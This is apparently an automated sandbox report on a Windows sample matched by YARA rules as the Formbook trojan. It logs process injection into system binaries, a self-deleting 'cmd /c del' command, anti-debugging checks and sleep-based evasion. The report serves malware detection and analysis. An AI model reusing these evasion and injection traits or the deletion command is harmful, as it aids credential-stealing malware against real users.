          Source: 00000005.00000002.11880642057.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.6907188311.0000000005BD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.6907188311.0000000005BD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.6907188311.0000000005BD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.11881186452.00000000032C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.11881186452.00000000032C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.11881186452.00000000032C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.11881283456.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.11881283456.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.11881283456.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.6838996006.000001ED09400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.6838996006.000001ED09400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.6838996006.000001ED09400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: kHslwiV2w6.exe PID: 7164, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: csc.exe PID: 1408, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: raserver.exe PID: 6624, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: kHslwiV2w6.exeStatic PE information: Section: .rsrc ZLIB complexity 0.9950388536096256
          Source: classification engineClassification label: mal100.troj.evad.winEXE@385/0@23/5
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F5B1830 LookupPrivilegeValueW,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLargePageMinimum,VirtualAlloc,GetCurrentProcess,VirtualAllocExNuma,0_2_00007FF72F5B1830
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_00D1A010 CoCreateInstance,5_2_00D1A010
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_00D152BB LoadLibraryExW,FindResourceExW,LoadResource,SizeofResource,MultiByteToWideChar,FreeLibrary,5_2_00D152BB
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6860:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6860:304:WilStaging_02
          Source: C:\Windows\SysWOW64\raserver.exeCommand line argument: offerraupdate5_2_00D19AC5
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: kHslwiV2w6.exeReversingLabs: Detection: 47%
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeFile read: C:\Users\user\Desktop\kHslwiV2w6.exe
          Source: unknownProcess created: C:\Users\user\Desktop\kHslwiV2w6.exe "C:\Users\user\Desktop\kHslwiV2w6.exe"
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\raserver.exe "C:\Windows\SysWOW64\raserver.exe"
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeSection loaded: apphelp.dll
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeSection loaded: edgegdi.dll
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeSection loaded: kernel.appcore.dll
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeSection loaded: windows.storage.dll
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeSection loaded: wldp.dll
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeSection loaded: profapi.dll
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeSection loaded: icu.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: edgegdi.dll
          Source: C:\Windows\SysWOW64\raserver.exeSection loaded: wtsapi32.dll
          Source: C:\Windows\SysWOW64\raserver.exeSection loaded: samcli.dll
          Source: C:\Windows\SysWOW64\raserver.exeSection loaded: netutils.dll
          Source: C:\Windows\SysWOW64\raserver.exeSection loaded: edgegdi.dll
          Source: C:\Windows\SysWOW64\raserver.exeSection loaded: wininet.dll
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{603D3801-BD81-11d0-A3A5-00C04FD706EC}\InProcServer32
          Source: kHslwiV2w6.exeStatic PE information: Image base 0x140000000 > 0x60000000
          Source: kHslwiV2w6.exeStatic file information: File size 1627744 > 1048576
          Source: kHslwiV2w6.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: kHslwiV2w6.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: kHslwiV2w6.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: kHslwiV2w6.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: kHslwiV2w6.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: kHslwiV2w6.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: kHslwiV2w6.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: wntdll.pdbUGP source: csc.exe, 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 00000003.00000003.6839534586.0000000005A89000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000003.00000003.6836618547.00000000058D6000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000005.00000003.6906389856.0000000004C10000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000005.00000002.11882185438.000000000508D000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000005.00000003.6909732118.0000000004DB3000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000005.00000002.11882185438.0000000004F60000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: csc.exe, csc.exe, 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 00000003.00000003.6839534586.0000000005A89000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000003.00000003.6836618547.00000000058D6000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, raserver.exe, 00000005.00000003.6906389856.0000000004C10000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000005.00000002.11882185438.000000000508D000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000005.00000003.6909732118.0000000004DB3000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000005.00000002.11882185438.0000000004F60000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: RAServer.pdb source: csc.exe, 00000003.00000002.6908271712.0000000005FB0000.00000040.10000000.00040000.00000000.sdmp, csc.exe, 00000003.00000002.6906475717.0000000005237000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, raserver.exe, 00000005.00000002.11880773620.0000000000D10000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: StrongNameFreeBufferStrongNameTokenFromPublicKeyStrongNameErrorInfo.PDBdiasymreader.dllDllGetClassObject%X%X%X%X%X%X%X%X%X%X%X.TMP0x%016I64xCSCalink.dll with IAlink3 source: explorer.exe, 00000004.00000002.11899785830.0000000013F5F000.00000004.80000000.00040000.00000000.sdmp, raserver.exe, 00000005.00000002.11883241933.000000000554F000.00000004.10000000.00040000.00000000.sdmp, raserver.exe, 00000005.00000002.11881524819.0000000004C14000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: RAServer.pdbGCTL source: csc.exe, 00000003.00000002.6908271712.0000000005FB0000.00000040.10000000.00040000.00000000.sdmp, csc.exe, 00000003.00000002.6906475717.0000000005237000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000005.00000002.11880773620.0000000000D10000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: csc.pdb source: explorer.exe, 00000004.00000002.11899785830.0000000013F5F000.00000004.80000000.00040000.00000000.sdmp, raserver.exe, 00000005.00000002.11883241933.000000000554F000.00000004.10000000.00040000.00000000.sdmp, raserver.exe, 00000005.00000002.11881524819.0000000004C14000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: csc.pdbF source: explorer.exe, 00000004.00000002.11899785830.0000000013F5F000.00000004.80000000.00040000.00000000.sdmp, raserver.exe, 00000005.00000002.11883241933.000000000554F000.00000004.10000000.00040000.00000000.sdmp, raserver.exe, 00000005.00000002.11881524819.0000000004C14000.00000004.00000020.00020000.00000000.sdmp
          Source: kHslwiV2w6.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: kHslwiV2w6.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: kHslwiV2w6.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: kHslwiV2w6.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: kHslwiV2w6.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_00D1ACA0 LoadLibraryW,GetProcAddress,GetProcAddress,WTSEnumerateSessionsW,GetProcessHeap,HeapAlloc,WTSFreeMemory,WTSFreeMemory,WTSQuerySessionInformationW,WTSQuerySessionInformationW,StrCmpIW,GetProcessHeap,HeapAlloc,SafeArrayCreateVector,SafeArrayAccessData,SysAllocString,SafeArrayUnaccessData,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,WTSFreeMemory,WTSFreeMemory,WTSFreeMemory,SafeArrayDestroy,SysFreeString,5_2_00D1ACA0
          Source: kHslwiV2w6.exeStatic PE information: section name: .managed
          Source: kHslwiV2w6.exeStatic PE information: section name: hydrated
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_00417968 pushfd ; retf 3_2_0041796A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_004191A3 push di; retf 3_2_004191A6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_00416479 push ebp; ret 3_2_00416450
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_0041640A push ebp; ret 3_2_00416450
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_0041D4B5 push eax; ret 3_2_0041D508
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_0041D56C push eax; ret 3_2_0041D572
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_0041D502 push eax; ret 3_2_0041D508
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_0041D50B push eax; ret 3_2_0041D572
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_00417D1E push esp; ret 3_2_00417D32
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_00417D3C push esp; ret 3_2_00417D32
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_00417655 push esi; iretd 3_2_00417656
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_0041760D push esi; retf 3_2_0041761D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C608CD push ecx; mov dword ptr [esp], ecx3_2_05C608D6
          Source: C:\Windows\explorer.exeCode function: 4_2_028809B5 push esp; retn 0000h4_2_02880AE7
          Source: C:\Windows\explorer.exeCode function: 4_2_02880B02 push esp; retn 0000h4_2_02880B03
          Source: C:\Windows\explorer.exeCode function: 4_2_02880B1E push esp; retn 0000h4_2_02880B1F
          Source: C:\Windows\explorer.exeCode function: 4_2_1344EB02 push esp; retn 0000h4_2_1344EB03
          Source: C:\Windows\explorer.exeCode function: 4_2_1344EB1E push esp; retn 0000h4_2_1344EB1F
          Source: C:\Windows\explorer.exeCode function: 4_2_1344E9B5 push esp; retn 0000h4_2_1344EAE7
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_00D229BD push ecx; ret 5_2_00D229D0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_00D2252C push ecx; ret 5_2_00D2253F
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04F908CD push ecx; mov dword ptr [esp], ecx5_2_04F908D6
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_00C691A3 push di; retf 5_2_00C691A6
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_00C67968 pushfd ; retf 5_2_00C6796A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_00C6D4B5 push eax; ret 5_2_00C6D508
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_00C66479 push ebp; ret 5_2_00C66450
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_00C6640A push ebp; ret 5_2_00C66450
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_00C6DD4D push cs; retf 5_2_00C6DD50
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_00C6D56C push eax; ret 5_2_00C6D572
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_00C6D502 push eax; ret 5_2_00C6D508
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_00C6D50B push eax; ret 5_2_00C6D572
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\raserver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeAPI/Special instruction interceptor: Address: 7FFCB0D8D144
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeAPI/Special instruction interceptor: Address: 7FFCB0D90594
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeAPI/Special instruction interceptor: Address: 7FFCB0D8FF74
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeAPI/Special instruction interceptor: Address: 7FFCB0D8D6C4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeAPI/Special instruction interceptor: Address: 7FFCB0D8D864
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeAPI/Special instruction interceptor: Address: 7FFCB0D8D004
          Source: C:\Windows\SysWOW64\raserver.exeAPI/Special instruction interceptor: Address: 7FFCB0D8D144
          Source: C:\Windows\SysWOW64\raserver.exeAPI/Special instruction interceptor: Address: 7FFCB0D90594
          Source: C:\Windows\SysWOW64\raserver.exeAPI/Special instruction interceptor: Address: 7FFCB0D8D764
          Source: C:\Windows\SysWOW64\raserver.exeAPI/Special instruction interceptor: Address: 7FFCB0D8D324
          Source: C:\Windows\SysWOW64\raserver.exeAPI/Special instruction interceptor: Address: 7FFCB0D8D364
          Source: C:\Windows\SysWOW64\raserver.exeAPI/Special instruction interceptor: Address: 7FFCB0D8D004
          Source: C:\Windows\SysWOW64\raserver.exeAPI/Special instruction interceptor: Address: 7FFCB0D8FF74
          Source: C:\Windows\SysWOW64\raserver.exeAPI/Special instruction interceptor: Address: 7FFCB0D8D6C4
          Source: C:\Windows\SysWOW64\raserver.exeAPI/Special instruction interceptor: Address: 7FFCB0D8D864
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeMemory allocated: 1ED04E40000 memory reserve | memory write watch
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_00409AB0 rdtsc 3_2_00409AB0
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 9865
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 879
          Source: C:\Windows\SysWOW64\raserver.exeWindow / User API: threadDelayed 9394
          Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-29224
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeAPI coverage: 2.0 %
          Source: C:\Windows\SysWOW64\raserver.exeAPI coverage: 1.7 %
          Source: C:\Windows\explorer.exe TID: 5936Thread sleep count: 102 > 30
          Source: C:\Windows\explorer.exe TID: 5936Thread sleep time: -204000s >= -30000s
          Source: C:\Windows\explorer.exe TID: 5936Thread sleep count: 9865 > 30
          Source: C:\Windows\explorer.exe TID: 5936Thread sleep time: -19730000s >= -30000s
          Source: C:\Windows\SysWOW64\raserver.exe TID: 6960Thread sleep count: 120 > 30
          Source: C:\Windows\SysWOW64\raserver.exe TID: 6960Thread sleep time: -240000s >= -30000s
          Source: C:\Windows\SysWOW64\raserver.exe TID: 6960Thread sleep count: 9394 > 30
          Source: C:\Windows\SysWOW64\raserver.exe TID: 6960Thread sleep time: -18788000s >= -30000s
          Source: C:\Windows\SysWOW64\raserver.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F5B1460 GetSystemInfo,GetNumaHighestNodeNumber,GetCurrentProcess,GetProcessGroupAffinity,GetLastError,GetCurrentProcess,GetProcessAffinityMask,0_2_00007FF72F5B1460
          Source: explorer.exe, 00000004.00000002.11892830107.000000000D3AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6853066858.000000000D3AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624058026.000000000D3AB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000004.00000002.11890837892.000000000CE47000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6852064723.000000000CE47000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWS
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information queried: ProcessInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\raserver.exeProcess queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_00409AB0 rdtsc 3_2_00409AB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_0040ACF0 LdrLoadDll,3_2_0040ACF0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_00D1ACA0 LoadLibraryW,GetProcAddress,GetProcAddress,WTSEnumerateSessionsW,GetProcessHeap,HeapAlloc,WTSFreeMemory,WTSFreeMemory,WTSQuerySessionInformationW,WTSQuerySessionInformationW,StrCmpIW,GetProcessHeap,HeapAlloc,SafeArrayCreateVector,SafeArrayAccessData,SysAllocString,SafeArrayUnaccessData,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,WTSFreeMemory,WTSFreeMemory,WTSFreeMemory,SafeArrayDestroy,SysFreeString,5_2_00D1ACA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D086C2 mov eax, dword ptr fs:[00000030h]3_2_05D086C2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C8D6D0 mov eax, dword ptr fs:[00000030h]3_2_05C8D6D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C596E0 mov eax, dword ptr fs:[00000030h]3_2_05C596E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C596E0 mov eax, dword ptr fs:[00000030h]3_2_05C596E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C6C6E0 mov eax, dword ptr fs:[00000030h]3_2_05C6C6E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C656E0 mov eax, dword ptr fs:[00000030h]3_2_05C656E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C656E0 mov eax, dword ptr fs:[00000030h]3_2_05C656E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C656E0 mov eax, dword ptr fs:[00000030h]3_2_05C656E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C866E0 mov eax, dword ptr fs:[00000030h]3_2_05C866E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C866E0 mov eax, dword ptr fs:[00000030h]3_2_05C866E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CDC6F2 mov eax, dword ptr fs:[00000030h]3_2_05CDC6F2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CDC6F2 mov eax, dword ptr fs:[00000030h]3_2_05CDC6F2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C70680 mov eax, dword ptr fs:[00000030h]3_2_05C70680
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C70680 mov eax, dword ptr fs:[00000030h]3_2_05C70680
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C70680 mov eax, dword ptr fs:[00000030h]3_2_05C70680
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C70680 mov eax, dword ptr fs:[00000030h]3_2_05C70680
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C70680 mov eax, dword ptr fs:[00000030h]3_2_05C70680
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C70680 mov eax, dword ptr fs:[00000030h]3_2_05C70680
